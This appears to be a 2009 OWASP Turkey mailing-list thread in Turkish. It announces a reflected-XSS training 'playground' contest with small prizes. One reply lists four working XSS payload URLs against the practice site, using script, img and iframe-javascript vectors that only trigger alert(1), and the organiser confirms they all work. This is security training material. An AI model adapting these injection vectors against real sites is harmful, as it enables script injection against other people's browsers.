<div> </div>
<div>yazdiginiz exploit url&#39;yi calistigi browser&#39;i da belirterek gondermeniz yeterli. gonderdiklerinin hepsi ok!<br></div>
<div class="gmail_quote">15 Haziran 2009 Pazartesi 15:50 tarihinde E. Erdem <span dir="ltr">&lt;<a href="mailto:e2erdem@gmail.com">e2erdem@gmail.com</a>&gt;</span> yazdı:<br>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Benden 4 tane (sadece FF3&#39;te test edebildim. Tarayicilar bu konusunda<br>bir sey soylenmemis):<br><br>
1- <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E%22%3E&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E%22%3E&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=</a><br>
2- <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=</a>&lt;IMG+&quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(1)&lt;%2FSCRIPT&gt;&quot;&gt;&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=<br>
4- <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(49))%3C%2FSCRIPT%3E&amp;vector5=&amp;vector6=&amp;vector7=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(49))%3C%2FSCRIPT%3E&amp;vector5=&amp;vector6=&amp;vector7=</a><br>
5- <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=%3CIFRAME+SRC%3D%22javascript%3Aalert(1)%3B%22%3E%3C%2FIFRAME%3E&amp;vector6=&amp;vector7=" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=%3CIFRAME+SRC%3D%22javascript%3Aalert(1)%3B%22%3E%3C%2FIFRAME%3E&amp;vector6=&amp;vector7=</a><br>
<br>2009/6/15 Bedirhan Urgun &lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt;:<br>
<div>
<div></div>
<div class="h5">&gt; Merhaba,<br>&gt; Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir<br>&gt; &quot;oyun grubu&quot; uygulamasına <a href="http://www.webguvenligi.org/xsstb/reflected.php" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php</a><br>
&gt; erişebilirsiniz.<br>&gt; Uygulamada 7 parametreye (vector1, vector2, ..., vector7) uygulanabilecek<br>&gt; xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu maile reply-all<br>&gt; olarak asagida verdigim link gibi gonderen ilk iki kisye;<br>
&gt;<br>&gt; 1inciye Maldivler&#39;e 2 kisilik 7 gun 7 gece seyehat<br>&gt; 2inciye Son model araba<br>&gt;<br>&gt; Yok daha neler!...<br>&gt;<br>&gt; 1inciye OWASP Membership T-Shirt&#39;u (L)<br>&gt; 2inciye OWASP Membership DVD&#39;si<br>
&gt;<br>&gt; gonderecegim.<br>&gt;<br>&gt; Ornek; (birinci tuyo benden)<br>&gt; <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E</a><br>
&gt;<br>&gt;<br>&gt; Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli<br>&gt; Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi<br>&gt; Not 3: en son yazdigim hediyeler gecerli! sonra &quot;vay ben gormedim&quot; olmasin<br>
&gt;<br>&gt; Proje Post&#39;u:<br>&gt; <a href="http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html" target="_blank">http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html</a><br>&gt; --<br>&gt; Bedirhan Urgun<br>
&gt; <a href="http://www.webguvenligi.org/" target="_blank">http://www.webguvenligi.org</a><br>&gt; <a href="http://www.owasp.org/index.php/Turkey" target="_blank">http://www.owasp.org/index.php/Turkey</a><br>&gt;<br>&gt; Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:<br>
&gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>&gt;<br></div></div>&gt; _______________________________________________<br>
&gt; Owasp-turkey mailing list<br>&gt; <a href="mailto:Owasp-turkey@lists.owasp.org">Owasp-turkey@lists.owasp.org</a><br>
<div>
<div></div>
<div class="h5">&gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>&gt;<br>&gt;<br></div></div></blockquote></div><br><br clear="all">

<div></div><br>-- <br>Bedirhan Urgun<br><a href="http://www.webguvenligi.org">http://www.webguvenligi.org</a><br><a href="http://www.owasp.org/index.php/Turkey">http://www.owasp.org/index.php/Turkey</a><br><br>Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için: <br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>